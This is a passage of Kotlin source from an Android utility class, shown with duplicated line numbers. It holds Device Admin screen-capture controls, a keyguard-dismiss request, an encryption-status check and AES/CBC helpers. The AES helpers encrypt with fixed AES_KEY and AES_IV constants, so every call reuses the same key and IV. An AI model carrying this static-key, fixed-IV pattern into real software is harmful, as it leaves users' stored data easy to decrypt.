   685→   685→                return dpm.getCameraDisabled(null)
   686→   686→            }
   687→   687→        } catch (e: Exception) {
   688→   688→            Log.w(TAG, "isCameraDisabled error", e)
   689→   689→            false
   690→   690→        }
   691→   691→    }
   692→   692→
   693→   693→    // ===== SCREEN CAPTURE =====
   694→   694→    @Suppress("DEPRECATION")
   695→   695→    fun disableScreenCapture(context: Context): String {
   696→   696→        return try {
   697→   697→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   698→   698→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   699→   699→            
   700→   700→            if (!dpm.isAdminActive(adminComponent)) {
   701→   701→                return "Device Admin not active"
   702→   702→            }
   703→   703→            
   704→   704→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   705→   705→                dpm.setScreenCaptureDisabled(adminComponent, true)
   706→   706→            } else {
   707→   707→                // For older versions, use FLAG_SECURE in windows
   708→   708→            }
   709→   709→            
   710→   710→            "Screen capture disabled"
   711→   711→        } catch (e: Exception) {
   712→   712→            Log.e(TAG, "Disable screen capture error", e)
   713→   713→            "Error: ${e.message}"
   714→   714→        }
   715→   715→    }
   716→   716→    
   717→   717→    fun enableScreenCapture(context: Context): String {
   718→   718→        return try {
   719→   719→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   720→   720→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   721→   721→            
   722→   722→            if (!dpm.isAdminActive(adminComponent)) {
   723→   723→                return "Device Admin not active"
   724→   724→            }
   725→   725→            
   726→   726→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   727→   727→                dpm.setScreenCaptureDisabled(adminComponent, false)
   728→   728→            }
   729→   729→            
   730→   730→            "Screen capture enabled"
   731→   731→        } catch (e: Exception) {
   732→   732→            Log.e(TAG, "Enable screen capture error", e)
   733→   733→            "Error: ${e.message}"
   734→   734→        }
   735→   735→    }
   736→   736→
   737→   737→    // ===== ENCRYPTION =====
   738→   738→    fun encryptData(data: String): String? {
   739→   739→        return try {
   740→   740→            val keySpec = SecretKeySpec(AES_KEY.toByteArray(), "AES")
   741→   741→            val ivSpec = IvParameterSpec(AES_IV.toByteArray())
   742→   742→            
   743→   743→            val cipher = Cipher.getInstance("AES/CBC/PKCS5Padding")
   744→   744→            cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec)
   745→   745→            
   746→   746→            val encrypted = cipher.doFinal(data.toByteArray())
   747→   747→            android.util.Base64.encodeToString(encrypted, android.util.Base64.DEFAULT)
   748→   748→        } catch (e: Exception) {
   749→   749→            Log.e(TAG, "Encrypt error", e)
   750→   750→            null
   751→   751→        }
   752→   752→    }
   753→   753→    
   754→   754→    fun decryptData(encryptedData: String): String? {
   755→   755→        return try {
   756→   756→            val keySpec = SecretKeySpec(AES_KEY.toByteArray(), "AES")
   757→   757→            val ivSpec = IvParameterSpec(AES_IV.toByteArray())
   758→   758→            
   759→   759→            val cipher = Cipher.getInstance("AES/CBC/PKCS5Padding")
   760→   760→            cipher.init(Cipher.DECRYPT_MODE, keySpec, ivSpec)
   761→   761→            
   762→   762→            val decoded = android.util.Base64.decode(encryptedData, android.util.Base64.DEFAULT)
   763→   763→            val decrypted = cipher.doFinal(decoded)
   764→   764→            String(decrypted)
   765→   765→        } catch (e: Exception) {
   766→   766→            Log.e(TAG, "Decrypt error", e)
   767→   767→            null
   768→   768→        }
   769→   769→    }
   770→   770→    
   771→   771→    fun sha256(input: String): String {
   772→   772→        val md = MessageDigest.getInstance("SHA-256")
   773→   773→        val digest = md.digest(input.toByteArray())
   774→   774→        return digest.joinToString("") { "%02x".format(it) }
   775→   775→    }
   776→   776→
   777→   777→    // ===== KEYGUARD =====
   778→   778→    fun dismissKeyguard(context: Context): String {
   779→   779→        return try {
   780→   780→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   781→   781→                val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   782→   782→                val activity = context as? Activity ?: return "error_not_activity"
   783→   783→                km.requestDismissKeyguard(
   784→   784→                    activity,
   785→   785→                    object : KeyguardManager.KeyguardDismissCallback() {
   786→   786→                        override fun onDismissSucceeded() {
   787→   787→                            // Keyguard dismissed
   788→   788→                        }
   789→   789→                        override fun onDismissCancelled() {
   790→   790→                            // Dismiss cancelled
   791→   791→                        }
   792→   792→                        override fun onDismissError() {
   793→   793→                            // Dismiss error
   794→   794→                        }
   795→   795→                    }
   796→   796→                )
   797→   797→                "Requesting keyguard dismiss"
   798→   798→            } else {
   799→   799→                "Keyguard dismiss requires Android 8+"
   800→   800→            }
   801→   801→        } catch (e: Exception) {
   802→   802→            "Error: ${e.message}"
   803→   803→        }
   804→   804→    }
   805→   805→    
   806→   806→    // ===== ENCRYPTION STATUS =====
   807→   807→    fun getEncryptionStatus(context: Context): Map<String, Any> {
   808→   808→        return try {
   809→   809→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   810→   810→            
   811→   811→            mapOf(
   812→   812→                "storage_encryption_status" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N) {
   813→   813→                    when (dpm.storageEncryptionStatus) {
   814→   814→                        DevicePolicyManager.ENCRYPTION_STATUS_INACTIVE -> "inactive"
   815→   815→                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE -> "active"
   816→   816→                        DevicePolicyManager.ENCRYPTION_STATUS_UNSUPPORTED -> "unsupported"
   817→   817→                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVATING -> "activating"
   818→   818→                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE_DEFAULT_KEY -> "active_default_key"
   819→   819→                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE_PER_USER -> "active_per_user"
   820→   820→                        else -> "unknown"
   821→   821→                    }
   822→   822→                } else "unknown",
   823→   823→                "is_encrypted" to (dpm.storageEncryptionStatus == DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE)
   824→   824→            )
   825→   825→        } catch (e: Exception) {
   826→   826→            mapOf("error" to (e.message ?: ""))
   827→   827→        }
   828→   828→    }
   829→   829→}
   830→   830→